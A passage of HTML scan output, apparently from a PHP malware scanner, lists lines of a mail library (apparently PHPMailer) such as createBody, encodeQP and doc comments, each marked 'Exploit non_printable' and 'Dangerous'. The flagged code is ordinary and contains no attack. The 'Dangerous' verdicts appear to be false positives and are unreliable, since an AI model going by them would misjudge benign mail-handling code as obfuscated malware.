</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2662</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2678</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2715</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2720</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2722</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2757</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2787</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2830</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2832</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2968</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2997</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3037</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3057</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3076</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
